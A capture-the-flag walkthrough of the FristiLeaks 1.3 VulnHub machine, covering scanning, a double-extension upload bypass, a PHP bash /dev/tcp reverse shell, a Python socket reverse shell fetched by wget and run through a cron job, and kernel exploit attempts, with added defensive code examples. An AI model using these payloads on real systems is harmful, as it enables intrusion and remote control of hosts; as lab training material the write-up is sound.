Target machine:
https://www.vulnhub.com/entry/fristileaks-13,133/
1. Host discovery and information gathering
Host discovery
arp-scan -l
Target IP: 192.168.25.226
export ip=192.168.25.226
Port scan
nmap --min-rate 10000 -p- $ip
PORT   STATE SERVICE
80/tcp open  http
Only port 80 is open.
Service and version scan
nmap -sS -sV -O -p80 $ip
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
Vulnerability script scan
nmap --script=vuln -p80 $ip
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /robots.txt: Robots file
|   /icons/: Potentially interesting folder w/ directory listing
|_  /images/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
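The service line above ("Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)") packs product, version and module information into one string. The following parser, an added example that is not part of the original write-up, turns nmap's normal-output port rows into structured records so that product versions can be compared against an inventory. The sample input is constructed: it repeats the page's 80/tcp row and adds a closed 22/tcp row that the real scan did not show.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in nmap's normal output format: the service line from the
# scan above plus one closed port, so the parser is exercised on more than one row.
SAMPLE_NMAP_OUTPUT = """\
PORT   STATE  SERVICE VERSION
80/tcp open   http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
22/tcp closed ssh
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
"""

# One port row: "80/tcp open http <version info>"
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open\|filtered|open|closed|filtered)\s+"
    r"(?P<service>\S+)\s*(?P<version>.*)$"
)
# Leading "Product name 1.2.3" before any parenthesised extra info.
PRODUCT_VERSION = re.compile(r"^(?P<product>[A-Za-z][\w .-]*?)\s+(?P<version>\d[\w.]*)\b")
# Module tokens such as "DAV/2" or "PHP/5.3.3" anywhere in the version string.
MODULE_TOKEN = re.compile(r"\b([A-Za-z][\w-]*)/(\d[\w.]*)")


@dataclass
class ServiceRecord:
    port: int
    proto: str
    state: str
    service: str
    product: str = ""
    version: str = ""
    modules: dict = field(default_factory=dict)


def parse_nmap_services(text: str) -> list:
    """Turn the port rows of nmap normal output into ServiceRecord objects."""
    records = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if not m:
            continue  # header, MAC address and OS-guess lines are not port rows
        rec = ServiceRecord(int(m["port"]), m["proto"], m["state"], m["service"])
        info = m["version"].strip()
        pv = PRODUCT_VERSION.match(info)
        if pv:
            rec.product = pv["product"].strip()
            rec.version = pv["version"]
        for name, number in MODULE_TOKEN.findall(info):
            rec.modules[name] = number
        records.append(rec)
    return records


def open_ports(records: list) -> list:
    return [r.port for r in records if r.state == "open"]


if __name__ == "__main__":
    for rec in parse_nmap_services(SAMPLE_NMAP_OUTPUT):
        print(rec)
```

For anything beyond a quick one-host check, run nmap with -oX and parse the XML instead; the text format is meant for humans and its spacing is not guaranteed to stay stable across versions.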
2. Starting the penetration test
Visiting the web service
A static page, but the text at the bottom of it contains some useful information.

Directory brute forcing
gobuster dir -u http://192.168.25.226/ -w /usr/share/dirbuster/wordlists/medium.txt
/images (Status: 301) [Size: 237] [--> http://192.168.25.226/images/]
/beer   (Status: 301) [Size: 235] [--> http://192.168.25.226/beer/]
/cola   (Status: 301) [Size: 235] [--> http://192.168.25.226/cola/]
Fingerprinting
whatweb http://192.168.25.226
http://192.168.25.226 [200 OK] Apache[2.2.15], Country[RESERVED][ZZ], HTTPServer[CentOS][Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3], IP[192.168.25.226], PHP[5.3.3], WebDAV[2]

Three identical images

This is not the right URL, so presumably we are meant to find the correct one.
Brute-force search
cewl http://192.168.25.226 -w url.txt
Here we use the cewl tool directly; it crawls the site, collects the words it finds and builds a wordlist from them.

Then we feed this wordlist straight into gobuster for scanning.

This directly turns up the login page.

The information we gathered earlier:
sisi
cola
beer
@meneer, @barrebas, @rikvduijn, @wez3forsec, @PyroBatNL, @0xDUDE, @annejanbrouwer, @Sander2121, Reinierk, @DearCharles, @miamat, MisterXE, BasB, Dwight, Egeltje, @pdersjant, @tcp130x10, @spierenburg, @ielmatani, @renepieters, Mystery guest, @EQ_uinix, @WhatSecurity, @mramsmeets, @Ar0xA
We can build a wordlist from it for weak-password brute forcing.
Viewing the page source gives us some encoded information.


We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR U5ErkJggg==
This looks like base64, so we decode it directly.

The format is wrong; from the first line we can tell it is a PNG file, so we change it to .png.
mv base64.txt base64.png
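The blob above is only recognisable as a PNG once it has been decoded and its first bytes inspected; a leftover from HTML wrapping (line breaks and spaces inside the string) is the usual reason a plain base64 decode reports a bad format. The helper below is an added example, not code from the original post: it strips that whitespace, restores padding, decodes, and names the file type from its magic bytes. The sample input is a constructed base64 string carrying only a PNG header, not the page's real image.

```python
import base64
import binascii
import re

# Magic-byte signatures of a few common file types (well-known values).
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),
    (b"\x7fELF", "elf"),
]


def clean_base64(blob: str) -> str:
    """Remove the whitespace and line breaks HTML wrapping inserts, then restore '=' padding."""
    stripped = re.sub(r"\s+", "", blob)
    return stripped + "=" * (-len(stripped) % 4)


def identify(data: bytes) -> str:
    """Name the file type from its leading magic bytes, or 'text'/'unknown'."""
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    try:
        data.decode("utf-8")
        return "text"
    except UnicodeDecodeError:
        return "unknown"


def decode_and_identify(blob: str):
    """Return (decoded bytes, type name); (None, 'not-base64') if decoding fails."""
    try:
        data = base64.b64decode(clean_base64(blob), validate=True)
    except (binascii.Error, ValueError):
        return None, "not-base64"
    return data, identify(data)


# Constructed sample: a PNG header wrapped across lines the way the page source
# above was. It is a stand-in, not the page's real image data.
SAMPLE_PNG_HEADER = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16).decode()
SAMPLE_WRAPPED = SAMPLE_PNG_HEADER[:20] + "\n " + SAMPLE_PNG_HEADER[20:]

if __name__ == "__main__":
    data, kind = decode_and_identify(SAMPLE_WRAPPED)
    print(kind, len(data))  # png 24
```

Renaming the text file to .png, as done above, only works if the bytes inside are already the decoded image; if the file still holds the base64 text, decode it first and then write the bytes out under the extension the magic bytes indicate.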

We get this image:
keKkeKKeKKeKkEkkEk
Together with the username eezeepz found earlier
we can try it, and the login succeeds.
A normal upload is blocked. The fingerprint shows an old Apache version, so we bypass the filter with a multi-extension filename.

The upload succeeds; now we look in the upload directory:
http://192.168.25.226/fristi/uploads/phpinfo.php.png
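The upload filter here only looked at the last extension, while Apache's mod_mime evaluates every dotted suffix, so a name like phpinfo.php.png can still reach the PHP handler on an AddHandler-based configuration. The validator below is an added example, not code from the lab or the post: it rejects any executable suffix anywhere in the name, allows exactly one extension, checks that the content's magic bytes match it, and never lets the client-supplied name reach the filesystem. The extension sets and type table are assumptions for the example.

```python
import os
import secrets

# Image types this upload endpoint accepts, keyed by the single extension we allow,
# with the magic bytes the content must start with.
ALLOWED_IMAGE_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Suffixes that Apache/PHP deployments commonly map to a handler. Because mod_mime
# evaluates every dotted suffix, one of these anywhere in the name is enough to reject.
EXECUTABLE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar",
    "cgi", "pl", "py", "sh", "htaccess",
}


def check_upload(filename: str, content: bytes):
    """Validate an upload; return (ok, reason, server_chosen_name)."""
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing or empty extension", None
    suffixes = parts[1:]
    if any(s in EXECUTABLE_EXTENSIONS for s in suffixes):
        return False, "executable extension present", None
    if len(suffixes) != 1:
        return False, "multiple extensions", None
    ext = "jpg" if suffixes[0] == "jpeg" else suffixes[0]
    magic = ALLOWED_IMAGE_TYPES.get(ext)
    if magic is None:
        return False, "type not allowed", None
    if not content.startswith(magic):
        return False, "content does not match extension", None
    # The client-supplied name never touches the filesystem: generate our own.
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    print(check_upload("phpinfo.php.png", png))   # rejected
    print(check_upload("avatar.png", png))        # accepted, random name
```

Two server-side points belong with this check. A magic-byte test does not stop PHP code appended after a valid image header, so the upload directory must not be executable (store it outside the web root, or serve it with the PHP handler disabled), and on Apache the handler should be bound with a FilesMatch on a trailing "\.php$" rather than AddHandler on the bare extension, so that a double extension never reaches the interpreter.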

We directly upload a PHP shell to get a reverse shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>

Remember to start the listener in Kali first, then upload the file and request it:
http://192.168.25.226/fristi/uploads/php%E5%8F%8D%E5%BC%B9.php.png
3. Obtaining initial access

4. Privilege escalation
id
uname -a
Linux 2.6.32
The kernel version is quite old, so we look for an exploit to escalate privileges.
searchsploit -t Linux 2.6.32 | grep Privile

Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
We use this CentOS exploit for privilege escalation.
searchsploit -m 25444
python -m http.server 800
Start the HTTP server on the attacking machine, then use wget from the shell to download the exploit.
cd /tmp                           # other directories are not writable
wget 192.168.25.132:800/25444.c   # download the exploit
head -n 20 25444.c                # read the usage notes
gcc -O2 25444.c && ./a.out        # invalid parameter, escalation fails
Let's try another exploit.
searchsploit -m 9844
wget 192.168.25.132:800/9844.py
python 9844.py                    # run it
Execution fails.
So we continue with information gathering.
cd /home/eezeepz
ls -liah

cat notes.txt
Yo EZ, I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/ Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. - Jerry
This is a hint that a cron job has been set up.
Here we write a file whose command spawns a reverse shell:
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.30.182",8421));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
Start the web server and download it with wget:
wget http://192.168.25.132/rc.py
echo '/usr/bin/python /tmp/rc.py' > runthis

Successfully escalated to root.
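The automation described in notes.txt fails because "/usr/bin/*" includes interpreters, so any file a low-privileged user drops in /tmp becomes code run under the admin account. The validator below is an added example, not the lab's cron script: it accepts only the utilities the note itself lists, resolves ".." in the binary path, and refuses arguments pointing into world-writable staging directories. The allow-lists and the sample runthis file are constructed for the example.

```python
import os
import shlex

# Allow-list built from the note's own wording: a few utilities from /usr/bin and
# the copies the admin placed in /home/admin. Interpreters are simply absent.
ALLOWED_DIRS = {"/usr/bin", "/home/admin"}
ALLOWED_BINARIES = {"chmod", "df", "cat", "echo", "ps", "grep", "egrep"}
# Arguments may not reach into world-writable staging directories.
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample runthis file; lines 3 and 4 are the kind the validator must reject.
SAMPLE_RUNTHIS = """\
/usr/bin/df -h
/home/admin/cat /etc/hostname
/usr/bin/python /tmp/rc.py
/usr/bin/../../tmp/evil
/usr/bin/grep -i error /var/log/messages
"""


def _in_staging_dir(arg: str) -> bool:
    if not os.path.isabs(arg):
        return False
    p = os.path.normpath(arg)
    return any(p == d or p.startswith(d + "/") for d in STAGING_DIRS)


def validate_command(line: str):
    """Return (argv, None) if the command may run, otherwise (None, reason)."""
    try:
        argv = shlex.split(line)
    except ValueError as exc:
        return None, f"unparseable: {exc}"
    if not argv:
        return None, "empty command"
    exe = argv[0]
    if not os.path.isabs(exe):
        return None, "binary must be an absolute path"
    resolved = os.path.normpath(exe)  # collapses /usr/bin/../../tmp/x
    if os.path.dirname(resolved) not in ALLOWED_DIRS:
        return None, f"{resolved} is outside the allowed directories"
    if os.path.basename(resolved) not in ALLOWED_BINARIES:
        return None, f"{os.path.basename(resolved)} is not on the allow-list"
    for arg in argv[1:]:
        if _in_staging_dir(arg):
            return None, f"argument {arg} points into a writable staging directory"
    return [resolved] + argv[1:], None


def validate_runthis(text: str):
    """Split a runthis file into accepted argv lists and (line number, line, reason) rejects."""
    accepted, rejected = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        argv, reason = validate_command(line)
        if argv is None:
            rejected.append((lineno, line, reason))
        else:
            accepted.append(argv)
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = validate_runthis(SAMPLE_RUNTHIS)
    for argv in ok:
        print("RUN  ", argv)  # hand to subprocess.run(argv, shell=False, timeout=...)
    for lineno, line, reason in bad:
        print("SKIP ", lineno, reason)
```

A real runner should additionally resolve symlinks with os.path.realpath before the directory check, execute each argv with shell=False and a timeout under the least-privileged account that can do the job, and write the result file somewhere only that account can write rather than /tmp, where any local user can pre-create or replace "cronresult".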
Unless otherwise stated, all articles on this blog are the author's original work.
If reposting, please credit the source: https://www.oneblanks.xyz/fristileaks_1-3%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/